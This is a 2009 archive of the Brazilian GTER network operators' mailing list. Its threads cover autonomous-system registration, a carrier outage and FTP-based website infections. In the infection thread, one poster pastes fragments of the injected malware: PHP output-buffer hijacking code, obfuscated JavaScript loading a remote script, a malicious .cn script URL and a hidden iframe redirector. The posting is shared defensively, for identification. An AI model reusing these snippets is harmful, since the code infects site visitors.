at tpn.com.br From itamar at ispbrasil.com.br Mon Jun 1 10:37:02 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Mon, 1 Jun 2009 10:37:02 -0300 Subject: [GTER] RES: SA - Sistema Autonomo In-Reply-To: <6A47709462534849BDCE531DE04758B1@INETWEB.local> References: <1243853767904.bruno@openline.com.br> <6A47709462534849BDCE531DE04758B1@INETWEB.local> Message-ID: a vantagem de ter AS e' que se uma das suas operadoras cair vc continua online. 2009/6/1 Cleber - Listas : > Ol? Pessoal, > > Tamb?m estamos buscando para entrar no processo de solicita??o do AS e > baseando nos problemas que os amigos possuem hoje, fico na Duvida o quanto > positivo ser? para n?s sermos um AS hoje. > > Gostaria de aproveitar e fazer algumas perguntas: > > *) Me tornando um AS, caso tenha dificuldades na publica??o entre > provedores, posso ficar fora do ar (caso tamb?m tenha um bloco de Ips)? > *) Que tipo de equipamento em especial preciso (Roteador Cisco ou posso > utilizar Quagga) ? > *) Sabem de existencia de um IDC que n?o permite clientes com AS pr?prio? > *) Quanto de esfor?o adicional em pessoal seria necess?rio ter, pois hoje > contratamos os links e Ips das operadoras e esse trabalho ? deles. > > Desde j?, agrade?o a todos. > > Abra?os > > Cleber Saad ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From cpereira at unisc.br Mon Jun 1 10:38:43 2009 From: cpereira at unisc.br (Cristiano Maynart Pereira) Date: Mon, 1 Jun 2009 10:38:43 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A__Problemas_com_resolu=E7=E3o_de_nome?= =?iso-8859-1?q?s_-_Resolver/DNS_BrasilTelecom?= In-Reply-To: <9697f7750906010617p2f39ab79p6ee39226d413b4b6@mail.gmail.com> References: <9697f7750906010617p2f39ab79p6ee39226d413b4b6@mail.gmail.com> Message-ID: <642A062A3EA5004EB84EBD1D34C1C54C0233D3D5@sun78.unisc.br> > > Pessoal, > > Voc?s perceberam problemas referente a resolu??o de > Nomes(Resolver) da BrasilTelecom? Sabem se ocorreu algum > cenario de mudan?a de endere?o IP, filtros por IPs de > origem(resolvendo somente para IPs da BrT), redirecionamento, etc. > Obrigado, > -- > Thiago Lizardo de Moraes > Consultor T?cnico > +55 41 8838 8561 > -- Lembrando, a OI adquiriu a Brasil Telecom. Pode ter rela??o com a fus?o das 2 empresas que aconteceu em maio ou com o inc?ndio no pr?dio da OI em Porto Alegre ontem: http://zerohora.clicrbs.com.br/zerohora/jsp/default.jsp?uf=1&local=1§ion=Geral&newsID=a2529379.xml Cristiano Maynart From marcelo at standardnet.com.br Mon Jun 1 10:45:10 2009 From: marcelo at standardnet.com.br (Marcelo - SNET) Date: Mon, 1 Jun 2009 10:45:10 -0300 Subject: [GTER] BRT completamente fora aqui no RS In-Reply-To: <4A23D1E9.7020306@sinos.net> References: <4A23C510.40207@standardnet.com.br> <4A23D1E9.7020306@sinos.net> Message-ID: <200906011045.11606.marcelo@standardnet.com.br> A Oi come?ou bem as atividades no RS. Que p? frio hein!!! Abra?os, Marcelo E. Geyer Standard Net Tecnologia. Em Segunda-feira 01 Junho 2009, ?s 10:04:41, Eduardo Santos Back escreveu: > E v?o continuar por um bom tempo, segundo me disseram h? pouco. Sem > previs?o de retorno ainda. > > Atenciosamente, > > > > Eduardo Santos Back > > Gerente de Inform?tica > > Grupo Editorial Sinos SA > > +55 51 3594-0417 > > www.gruposinos.com.br > > Marcelo Estanislau escreveu: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > Neste instante, celulares da BrOi continuam fora na regi?o metropolitana > > do RS. > > > > Abra?os, > > > > Marcelo Estanislau Geyer > > marcelo at standardnet.com.br > > Standard Net Tecnologia > > http://www.standardnet.com.br > > - -- > > PGP Key: ldap://keyserver.pgp.com - Key ID 0x5812DE5E From rcr.listas at ig.com.br Mon Jun 1 11:35:35 2009 From: rcr.listas at ig.com.br (Ricardo Rodrigues) Date: Mon, 1 Jun 2009 11:35:35 -0300 Subject: [GTER] =?iso-8859-1?q?Problemas_com_resolu=E7=E3o_de_nomes_-_Reso?= =?iso-8859-1?q?lver/DNS_BrasilTelecom?= In-Reply-To: <9697f7750906010617p2f39ab79p6ee39226d413b4b6@mail.gmail.com> References: <9697f7750906010617p2f39ab79p6ee39226d413b4b6@mail.gmail.com> Message-ID: <437c6dc60906010735x1f197ebob6faffcdcd6da7af@mail.gmail.com> Oi Thiago, seja mais espec?fico na sua pergunta e podemos ajudar melhor. Qual mudan?a voc? notou? Por qu? a pergunta? Abra?os, Ricardo 2009/6/1 Thiago Lizardo de Moraes : > Pessoal, > > ? ? ? ? ? ? Voc?s perceberam problemas referente a resolu??o de > Nomes(Resolver) da BrasilTelecom? Sabem se ocorreu algum cenario de mudan?a > de endere?o IP, filtros por IPs de origem(resolvendo somente para IPs da > BrT), redirecionamento, etc. > Obrigado, > -- > Thiago Lizardo de Moraes > Consultor T?cnico > +55 41 8838 8561 > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From lscrlstld at gmail.com Mon Jun 1 12:05:58 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Mon, 1 Jun 2009 12:05:58 -0300 Subject: [GTER] RES: RES: SA - Sistema Autonomo In-Reply-To: <6A47709462534849BDCE531DE04758B1@INETWEB.local> References: <1243853767904.bruno@openline.com.br> <6A47709462534849BDCE531DE04758B1@INETWEB.local> Message-ID: > Ol? Pessoal, > > Tamb?m estamos buscando para entrar no processo de > solicita??o do AS e baseando nos problemas que os amigos > possuem hoje, fico na Duvida o quanto positivo ser? para n?s > sermos um AS hoje. Sugiro avaliar muito sobre a necessidade ou n?o. Se for simplesmente por redud?ncia ? muito mais barato um colocation num IDC. > Gostaria de aproveitar e fazer algumas perguntas: > > *) Me tornando um AS, caso tenha dificuldades na publica??o > entre provedores, posso ficar fora do ar (caso tamb?m tenha > um bloco de Ips)? Sim, vc pode nascer com problemas, por exemplo 187/8. > *) Que tipo de equipamento em especial preciso (Roteador > Cisco ou posso utilizar Quagga) ? Full routing requer mais recurso, se for s? dois default gateways, at? um 2621 resolve. > *) Sabem de existencia de um IDC que n?o permite clientes com > AS pr?prio? Telecom ? movido a volume, dependendo qual o tamanho de sua conta, tem at? caf? expresso dentro do rack. > *) Quanto de esfor?o adicional em pessoal seria necess?rio > ter, pois hoje contratamos os links e Ips das operadoras e > esse trabalho ? deles. Pelo menos um netadmin pleno, ou terceiriza a implanta??o e/ou opera??o. From juliano at cyberweb.com.br Mon Jun 1 13:06:21 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Mon, 01 Jun 2009 13:06:21 -0300 Subject: [GTER] SA - Sistema Autonomo In-Reply-To: References: <1243853767904.bruno@openline.com.br> Message-ID: <4A23FC7D.9070800@cyberweb.com.br> Alfredo, Depende a operadora e do tamanho do contrato... um consultor com tr?nsito bom dentro da operadora tamb?m ajuda. Qual a operadora que tu tem esse problema? Juliano Alfredo Dal?Ava J?nior escreveu: > - Faltou mais um requisito: ter muuuita paci?ncia e ligar para os > consultores e 0800 das operadoras 2 vezes por dia... > Eu mesmo estou fazendo isso a mais de 45 dias e at? agora nada... > > > > 2009/6/1 bruno at openline.com.br > > >> --- "Newton M. Silva" escreveu: >> >>> Alguem poderia me passar o procedimento/pr?-requisitos para poder >>> se tornar uma AS ( Sistema autonomo). >>> >> - Ser multihomed (mais de um backbone ou backbone+ptt) >> >> - Demonstrar necessidade de pelo menos 1000 IPs de imediato >> (o bloco inicial tem 4096 IPs equivalente a 16 classes C >> ou um /20) >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From juliano at cyberweb.com.br Mon Jun 1 13:07:32 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Mon, 01 Jun 2009 13:07:32 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_V=EDrus_em_sites?= In-Reply-To: References: Message-ID: <4A23FCC4.5080800@cyberweb.com.br> Cleber, Sim, vem por FTP, normalmente IP internacional. O problema ocorre com sites com HTML, sem nada de PHP, sem permissao de execucao PHP, servidor cujo acesso ? realizado apenas pelo cliente, sem furos, sem ser shared... sem asp, sem jsp, mysql... ocorreu. Juliano Cleber - Listas escreveu: > Alexandre, > > Tem certeza que est? vindo via FTP, pois hoje em dia isso pode ocorrer de > maneiras: > > *) Via FTP mesmo, pois o cliente pode ter um trojan instalado na maquina que > fica monitorando e depois quando for transferir uma pagina index ou default, > o javascript vai junto (j? ocorreu com cliente nosso) > > *) Via Upload, alguma pagina ASP ou PHP mal programada aceita o upload de um > outro .ASP ou .PHP que se auto propaga em seu servidor nos diret?rios que > tem permissao de escrita. > > Recomenda??o, somente libere escrita para os clientes que o solicitem e > tenha um registro em hepldesk, excel ou at? mesmo em papel de p?o :) > > Se o caso realmente est? vindo via FTP, verifique para fazer bloqueios de > IP's e avise seus usu?rios, por exemplo se sabe que o dominio abc.com.br tem > acesso NET, fa?a um bloquei para a rede da NET do acesso ao dominio via FTP, > ? uma forma de ir isolando o problema e chegar at? a fonte. > > Espero ter ajudado. > > Cleber > > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em > nome de Alexandre Gorges > Enviada em: s?bado, 30 de maio de 2009 14:54 > Para: Lista GTER > Assunto: [GTER] V?rus em sites > > Boa tarde, > Faz alguns 15 dias, que estou com problemas em alguns sites de clientes. > N?o sei como ? descoberto a senha de FTP dos sites, mas o acesso sempre ? > internacional. > ? adicionado um javascript em todas as p?ginas do site do cliente. Alguns > antivirus n?o detectam, mas outros como Avast, AVG e Symantec detectam. > > Algu?m tamb?m est? passando por esse problema? > Botei o clamav para verificar o upload dos FTP. Mas infelizmente, o Clamav > n?o detecta esse javascript. > > > []'s > Alexandre Gorges > http://algorges.blogspot.com > http://www.dag.eti.br > MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > Nenhum v?rus encontrado nessa mensagem recebida. > Verificado por AVG - www.avgbrasil.com.br > Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.46/2143 - Data de > Lan?amento: 05/30/09 05:53:00 > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From juliano at cyberweb.com.br Mon Jun 1 13:10:31 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Mon, 01 Jun 2009 13:10:31 -0300 Subject: [GTER] RES: SA - Sistema Autonomo In-Reply-To: References: <1243853767904.bruno@openline.com.br> <6A47709462534849BDCE531DE04758B1@INETWEB.local> Message-ID: <4A23FD77.9000207@cyberweb.com.br> Itamar, Tem outra grande vantagem: voc? n?o fica preso aos IPs de uma operadora... se quiser trocar, ? s? cancelar o contrato e subir a sess?o com outra operadora... essa ? a GRANDE vantagem... em uma negocia??o comercial ou renegocia??o de contrato, a operadora j? entra em desvantagem, pois voce pode escolher qualquer outra, ja que nao depende dos IPs dela, ainda mais quando tu pensa em uma empresa que precisaria reconfigurar algumas centenas de esta??es e servidores. Juliano Itamar Reis Peixoto escreveu: > a vantagem de ter AS e' que se uma das suas operadoras cair vc continua online. > > > > 2009/6/1 Cleber - Listas : > >> Ol? Pessoal, >> >> Tamb?m estamos buscando para entrar no processo de solicita??o do AS e >> baseando nos problemas que os amigos possuem hoje, fico na Duvida o quanto >> positivo ser? para n?s sermos um AS hoje. >> >> Gostaria de aproveitar e fazer algumas perguntas: >> >> *) Me tornando um AS, caso tenha dificuldades na publica??o entre >> provedores, posso ficar fora do ar (caso tamb?m tenha um bloco de Ips)? >> *) Que tipo de equipamento em especial preciso (Roteador Cisco ou posso >> utilizar Quagga) ? >> *) Sabem de existencia de um IDC que n?o permite clientes com AS pr?prio? >> *) Quanto de esfor?o adicional em pessoal seria necess?rio ter, pois hoje >> contratamos os links e Ips das operadoras e esse trabalho ? deles. >> >> Desde j?, agrade?o a todos. >> >> Abra?os >> >> Cleber Saad >> > > > ------------ > > Itamar Reis Peixoto > > e-mail/msn: itamar at ispbrasil.com.br > sip: itamar at ispbrasil.com.br > skype: itamarjp > icq: 81053601 > +55 11 4063 5033 > +55 34 3221 8599 > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From mike at braslink.com Mon Jun 1 13:21:04 2009 From: mike at braslink.com (Mike Tesliuk) Date: Mon, 1 Jun 2009 13:21:04 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_Problema_Navega=E7=E3o_=28_Telefonic?= =?iso-8859-1?q?a_=29?= In-Reply-To: <200905310250.20403.herbert@scw.net.br> References: <276fbe8b0905291639t76a1cf49x3773cf19e619b87@mail.gmail.com> <200905310250.20403.herbert@scw.net.br> Message-ID: <7a152a290906010921l6c84c541u44baa2ab9110de4a@mail.gmail.com> N?s aqui ainda estamos com problemas com o link da telefonica , tive que trocar o acesso dos usu?rios para um Virtua porque esta terrivel. Telefonica disse que n?o h? anormalidades, mas que eu tenho que aguardar o pessoal de roteadores me responder. 2009/5/31 Herbert Faleiros : > On Sat 30 May 2009 09:44:37 Farrapo - LDR wrote: >> Deve especificar que o MSS seja modificado somente nos pacotes maiores que >> o desejado. Ex.: Incluir na tua linha: tcp-mss=1401-65535 > > > Ou ent?o usa o seguinte: new-mss=clamp-to-pmtu > (mesma t?cnica que descrevi no outro e-mail como exemplo p/ o Linux) > > -- > Herbert > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From tecwave at tecwave.com.br Mon Jun 1 13:14:05 2009 From: tecwave at tecwave.com.br (Alexandre Martini) Date: Mon, 01 Jun 2009 13:14:05 -0300 Subject: [GTER] RES: RES: SA - Sistema Autonomo In-Reply-To: References: <1243853767904.bruno@openline.com.br> <6A47709462534849BDCE531DE04758B1@INETWEB.local> Message-ID: <4A23FE4D.5020300@tecwave.com.br> Toledo, Luis Carlos escreveu: > > > >> Ol? Pessoal, >> >> Tamb?m estamos buscando para entrar no processo de >> solicita??o do AS e baseando nos problemas que os amigos >> possuem hoje, fico na Duvida o quanto positivo ser? para n?s >> sermos um AS hoje. >> > > Sugiro avaliar muito sobre a necessidade ou n?o. Se for simplesmente por > redud?ncia ? muito mais barato um colocation num IDC. > > >> Gostaria de aproveitar e fazer algumas perguntas: >> >> *) Me tornando um AS, caso tenha dificuldades na publica??o >> entre provedores, posso ficar fora do ar (caso tamb?m tenha >> um bloco de Ips)? >> > > Sim, vc pode nascer com problemas, por exemplo 187/8. > > >> *) Que tipo de equipamento em especial preciso (Roteador >> Cisco ou posso utilizar Quagga) ? >> > > Full routing requer mais recurso, se for s? dois default gateways, at? um > 2621 resolve. > > >> *) Sabem de existencia de um IDC que n?o permite clientes com >> AS pr?prio? >> > > Telecom ? movido a volume, dependendo qual o tamanho de sua conta, tem at? > caf? expresso dentro do rack. > > >> *) Quanto de esfor?o adicional em pessoal seria necess?rio >> ter, pois hoje contratamos os links e Ips das operadoras e >> esse trabalho ? deles. >> > > Pelo menos um netadmin pleno, ou terceiriza a implanta??o e/ou opera??o. > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > Ol? Luiz! desculpe o off, mas n?o tenho a quem recorrer... onde existe um banco do curr?culus para se pesquisar a contrata??o de um netadmin? Catho? Obrigado! -- []s Alexandre Martini Tecwave Internet :: http://www.tecwave.com.br :: From mfernandes at infolink.com.br Mon Jun 1 13:17:21 2009 From: mfernandes at infolink.com.br (Marcio Fernandes) Date: Mon, 01 Jun 2009 13:17:21 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_V=EDrus_em_sites?= In-Reply-To: <4A23FCC4.5080800@cyberweb.com.br> References: <4A23FCC4.5080800@cyberweb.com.br> Message-ID: <4A23FF11.7020604@infolink.com.br> Realmente, assim como o Juliano, tamb?m experimentamos estes tipos de eventos por aqui (InfoLink). Servidores de hospedagem est?tica, ou seja, sem PHP, ASP, JSP, MySQL, etc. Analisando os LOGs de FTP (s?o diversos IPs que fazem acessos fidedignos, normalmente internacionais: China, Russia, Pol?nia, entre outros), comprovamos a a??o a informamos aos nossos clientes. Logo, a capta??o da senha se d? no lado do cliente, principalmente quando os mesmos fazem acesso ao FTP atrav?s de cybercaf?s, faculdades, redes p?blicas, etc. []s Marcio Fernandes > > Cleber, > > Sim, vem por FTP, normalmente IP internacional. O problema ocorre com > sites com HTML, sem nada de PHP, sem permissao de execucao PHP, servidor > cujo acesso ? realizado apenas pelo cliente, sem furos, sem ser > shared... sem asp, sem jsp, mysql... ocorreu. > > Juliano > > Cleber - Listas escreveu: >> Alexandre, >> Tem certeza que est? vindo via FTP, pois hoje em dia isso pode ocorrer de >> maneiras: >> >> *) Via FTP mesmo, pois o cliente pode ter um trojan instalado na >> maquina que >> fica monitorando e depois quando for transferir uma pagina index ou >> default, >> o javascript vai junto (j? ocorreu com cliente nosso) >> >> *) Via Upload, alguma pagina ASP ou PHP mal programada aceita o upload >> de um >> outro .ASP ou .PHP que se auto propaga em seu servidor nos diret?rios que >> tem permissao de escrita. >> >> Recomenda??o, somente libere escrita para os clientes que o solicitem e >> tenha um registro em hepldesk, excel ou at? mesmo em papel de p?o :) >> >> Se o caso realmente est? vindo via FTP, verifique para fazer bloqueios de >> IP's e avise seus usu?rios, por exemplo se sabe que o dominio >> abc.com.br tem >> acesso NET, fa?a um bloquei para a rede da NET do acesso ao dominio >> via FTP, >> ? uma forma de ir isolando o problema e chegar at? a fonte. >> >> Espero ter ajudado. >> >> Cleber >> >> >> -----Mensagem original----- >> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em >> nome de Alexandre Gorges >> Enviada em: s?bado, 30 de maio de 2009 14:54 >> Para: Lista GTER >> Assunto: [GTER] V?rus em sites >> >> Boa tarde, >> Faz alguns 15 dias, que estou com problemas em alguns sites de clientes. >> N?o sei como ? descoberto a senha de FTP dos sites, mas o acesso sempre ? >> internacional. ? adicionado um javascript em todas as p?ginas do site >> do cliente. Alguns >> antivirus n?o detectam, mas outros como Avast, AVG e Symantec detectam. >> >> Algu?m tamb?m est? passando por esse problema? >> Botei o clamav para verificar o upload dos FTP. Mas infelizmente, o >> Clamav >> n?o detecta esse javascript. >> >> >> []'s >> Alexandre Gorges >> http://algorges.blogspot.com >> http://www.dag.eti.br >> MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com >> >> >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> Nenhum v?rus encontrado nessa mensagem recebida. >> Verificado por AVG - www.avgbrasil.com.br >> Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.46/2143 - Data de >> Lan?amento: 05/30/09 05:53:00 >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Cordialmente, Marcio Fernandes InfoLink - Hospedagem UNIX mfernandes at infolink.com.br http://dominio.infolink.com.br From itamar at ispbrasil.com.br Mon Jun 1 13:59:48 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Mon, 1 Jun 2009 13:59:48 -0300 Subject: [GTER] Demi e Vint Cerf - Internet do Futuro Message-ID: segue o link para o video. http://www.teia.mg.gov.br/profiles/blogs/videos-vint-cerf-com-a ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From MBORBA at trf3.jus.br Mon Jun 1 15:14:05 2009 From: MBORBA at trf3.jus.br (MARLON BORBA) Date: Mon, 01 Jun 2009 15:14:05 -0300 Subject: [GTER] RES: SA - Sistema Autonomo In-Reply-To: <4A23FD77.9000207@cyberweb.com.br> References: <1243853767904.bruno@openline.com.br> <6A47709462534849BDCE531DE04758B1@INETWEB.local> <4A23FD77.9000207@cyberweb.com.br> Message-ID: <4A23F03C.15A6.0046.0@trf3.jus.br> Isso para n?o falar da estabilidade das configura??es: voc? n?o precisa ajustar DNS (direto e reverso), modificar o seu cadastro no Registro .br, etc?tera e tal. Livra-se de um belo trabalho burocr?tico (por exemplo, se seu bloco ? menor do que um /26, voc? precisa aplicar a RFC 2317 e pedir pelo-amor-de-Deus para a sua operadora fazer as altera??es no DNS reverso nela, o que, dependendo da empresa, pode ser um parto). -- Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio ? Seguran?a da Informa??o Comiss?o Local de Resposta a Incidentes - CLRI TRF 3 Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- Em 1/6/2009 ?s 13:10, Juliano Primavesi - Cyberweb Networks gravou: > Itamar, > > Tem outra grande vantagem: voc? n?o fica preso aos IPs de uma > operadora... se quiser trocar, ? s? cancelar o contrato e subir a sess?o > com outra operadora... essa ? a GRANDE vantagem... em uma negocia??o > comercial ou renegocia??o de contrato, a operadora j? entra em > desvantagem, pois voce pode escolher qualquer outra, ja que nao depende > dos IPs dela, ainda mais quando tu pensa em uma empresa que precisaria > reconfigurar algumas centenas de esta??es e servidores. > > Juliano > > Itamar Reis Peixoto escreveu: >> a vantagem de ter AS e' que se uma das suas operadoras cair vc continua > online. >> >> >> >> 2009/6/1 Cleber - Listas : >> >>> Ol? Pessoal, >>> >>> Tamb?m estamos buscando para entrar no processo de solicita??o do AS e >>> baseando nos problemas que os amigos possuem hoje, fico na Duvida o quanto >>> positivo ser? para n?s sermos um AS hoje. >>> >>> Gostaria de aproveitar e fazer algumas perguntas: >>> >>> *) Me tornando um AS, caso tenha dificuldades na publica??o entre >>> provedores, posso ficar fora do ar (caso tamb?m tenha um bloco de Ips)? >>> *) Que tipo de equipamento em especial preciso (Roteador Cisco ou posso >>> utilizar Quagga) ? >>> *) Sabem de existencia de um IDC que n?o permite clientes com AS pr?prio? >>> *) Quanto de esfor?o adicional em pessoal seria necess?rio ter, pois hoje >>> contratamos os links e Ips das operadoras e esse trabalho ? deles. >>> >>> Desde j?, agrade?o a todos. >>> >>> Abra?os >>> >>> Cleber Saad >>> >> >> >> ------------ >> >> Itamar Reis Peixoto >> >> e-mail/msn: itamar at ispbrasil.com.br >> sip: itamar at ispbrasil.com.br >> skype: itamarjp >> icq: 81053601 >> +55 11 4063 5033 >> +55 34 3221 8599 >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From algorges at gmail.com Mon Jun 1 15:26:41 2009 From: algorges at gmail.com (Alexandre Gorges) Date: Mon, 01 Jun 2009 15:26:41 -0300 Subject: [GTER] RES: Virus em sites In-Reply-To: <4A23DBCA.6020908@jarruda.com> Message-ID: > From: Julio Arruda > Reply-To: Lista GTER > Date: Mon, 01 Jun 2009 09:46:50 -0400 > To: Lista GTER > Subject: Re: [GTER] RES: Virus em sites > > Alexandre Gorges wrote: >> Bom dia, Toledo >> >>>> J? foi desconsiderado isso, no servidor n?o tem nenhum usu?rio criado. >>>> Pesquisando pelo malware Gumblar, vi que a senha ? descoberta >>>> na m?quina do usu?rio com spyware. Muitos relatos de senhas >>>> capturadas com quem usa o Filezilla para acesso ao FTP. >>> Sim pode ocorrer dessa forma, mas a probabilidade do spywave infectar >>> justamente aqueles clientes que fazem FTP com vc ? infima. >>> Teriam que infectar milhares para encontrar um que hospeda com voc? e que >>> faz ftp. >>> Al?m disso, s?o mais de um cliente seu, o que complica as probabilidade. >>> Imagino que haja um ponto em comum entre eles(clientes). >> >> Mas eu n?o estou dizendo que est? acontecendo apenas comigo. >> Se voc? pesquisar por Gumblar, ir? ver v?rios casos de troca de site por >> FTP. >> De 730 dom?nios, foram infectados aqui 5 sites. E clientes sem rela??o entre >> eles, nem o desenvolvedor dos sites ? o mesmo. >> Um amigo de outro provedor, tamb?m relatou mesmo problema. Para alguns >> clientes apenas. > > Vamos imaginar que somente estes 5 fizeram updates via FTP desde que > houve o problema ? > Isto poderia explicar por que os outros nao foram 'contaminados' ? > Eu sou um pouco paranoico, e se alguem comprometer uma maquina minha, > mesmo que tenha aparencia de ser algo 'periferico' (os arquivos FTP), eu > ao menos daria uma verificada para ver se nao teve algo mais. Obvio que > e' facil para alguem que nao administra isto falar :-), mas... > > Uma outra coisa que voce pode tentar fazer e' dar uma verificada no > trafego deste servidor, ver se nao tem sessoes outgoing dele > 'inesperadas', um tipo de NBA manual :-)..Um outros facil, verificar > trafego para porta tcp 6667 outbound. > -- Tudo que voc? imaginar de verifica??o j? foi feita. Eu tenho o log do FTP provando o upload. J? achei at? um script em bash que varre tudo a procura. Esse ataque infecta quem navega nos sites, n?o o servidor. > gter list https://eng.registro.br/mailman/listinfo/gter From algorges at gmail.com Mon Jun 1 15:29:13 2009 From: algorges at gmail.com (Alexandre Gorges) Date: Mon, 01 Jun 2009 15:29:13 -0300 Subject: [GTER] RES: RES: Virus em sites In-Reply-To: Message-ID: N?o recebi, talvez foi moderado. Mas vou colocar partes do c?digo, acho que assim n?o ser? moderado, visto que n?o tem fun??o nenhuma. Na programa??o PHP, o c?digo ? parecido com esse: #is?,$s,$a)) foreach($a[0] as $v) if(count(explode(?\n?,$v))>5){ $e=preg_match(?#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#?,$v) || preg_match(?#[\(\[](\s*\d+,)20,}#?,$v); if((preg_match(?#\beval\b#?,$v)&&($e||strpos($v,?fromCharCode?)))||($e&&strp os;($v,?[removed]?)))$s=str_replace($v,?,$s);} $s1=preg_replace(?##?,?,$s); if(stristr($s,?body?)) s="preg_replace(?#(\s*body)#mi?,TMP_XHGFJOKL.?\1?,$s1);elseif(($s1!=">body?) )>?))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl' ])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_statu s(1) as $v)if(($a=$v['name'])==?tmp_lkojfghx?)return;else $s[]=array($a==?default output handler??false:$a); for($i=count($s)-1;$i>=0;$i?){$s[$i][1]=ob_get_contents();ob_end_clean();}ob _start(?tmp_lkojfghx?);for($i=0;$i Na programa??o Java Script, o c?digo ? tipo assim: (?%3CTPsSscrSsidNptNJn%20cM7sd6KrcTP%3D%2FNJn%2F9cM74TP%2E247TP%2E2%2E1NJn9c M75%2FcM7jquedNrSsy%2EcM7jsHY%3E%3C%2FSssTPcuvjripuvjtSs%3E?).replace(/TP|NJ n|HY|uvj|dN|Ss|d6K|cM7/g,"")); Ou ent?o uma chamada para um endere?o que carrega o java: http://b.rtbn2.cn/E/J.JS' No uso do iframe, o endere?o varia muito, mas ? algo assim: iframe src="http:%20//%20liteautotoponline%20.cn%20/%20ts%20/%20in.cgi?mozila11" style="visibility: hidden;" height="4" width="2" iframe []'s Alexandre Gorges http://algorges.blogspot.com http://www.dag.eti.br MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com > From: NOC NeoGrid > Reply-To: Lista GTER > Date: Mon, 1 Jun 2009 11:03:49 -0300 > To: Lista GTER > Subject: [GTER] RES: RES: Virus em sites > > Bom dia, > > Mandei um "exemplo" do c?digo para saber se era similar ao que foi encontrado > nos sites de quem iniciou a "thread", mas ningu?m respondeu ( nem que sim, nem > que n?o ). > Seria interessante mostrar o que identificaram nos arquivos, assim evitamos > diversas "possibilidades". > > Att, > > Dilson > NOC - Neogrid > www.neogrid.com > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome > de Julio Arruda > Enviada em: segunda-feira, 1 de junho de 2009 10:47 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] RES: Virus em sites > > Alexandre Gorges wrote: >> Bom dia, Toledo >> >>>> J? foi desconsiderado isso, no servidor n?o tem nenhum usu?rio criado. >>>> Pesquisando pelo malware Gumblar, vi que a senha ? descoberta >>>> na m?quina do usu?rio com spyware. Muitos relatos de senhas >>>> capturadas com quem usa o Filezilla para acesso ao FTP. >>> Sim pode ocorrer dessa forma, mas a probabilidade do spywave infectar >>> justamente aqueles clientes que fazem FTP com vc ? infima. >>> Teriam que infectar milhares para encontrar um que hospeda com voc? e que >>> faz ftp. >>> Al?m disso, s?o mais de um cliente seu, o que complica as probabilidade. >>> Imagino que haja um ponto em comum entre eles(clientes). >> >> Mas eu n?o estou dizendo que est? acontecendo apenas comigo. >> Se voc? pesquisar por Gumblar, ir? ver v?rios casos de troca de site por >> FTP. >> De 730 dom?nios, foram infectados aqui 5 sites. E clientes sem rela??o entre >> eles, nem o desenvolvedor dos sites ? o mesmo. >> Um amigo de outro provedor, tamb?m relatou mesmo problema. Para alguns >> clientes apenas. > > Vamos imaginar que somente estes 5 fizeram updates via FTP desde que > houve o problema ? > Isto poderia explicar por que os outros nao foram 'contaminados' ? > Eu sou um pouco paranoico, e se alguem comprometer uma maquina minha, > mesmo que tenha aparencia de ser algo 'periferico' (os arquivos FTP), eu > ao menos daria uma verificada para ver se nao teve algo mais. Obvio que > e' facil para alguem que nao administra isto falar :-), mas... > > Uma outra coisa que voce pode tentar fazer e' dar uma verificada no > trafego deste servidor, ver se nao tem sessoes outgoing dele > 'inesperadas', um tipo de NBA manual :-)..Um outros facil, verificar > trafego para porta tcp 6667 outbound. > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From security at neogrid.com Mon Jun 1 15:38:48 2009 From: security at neogrid.com (NOC NeoGrid) Date: Mon, 1 Jun 2009 15:38:48 -0300 Subject: [GTER] RES: RES: RES: Virus em sites In-Reply-To: References: Message-ID: Ol? Alexandre, Suspeito fortemente que a m?quina do "cliente" que tem 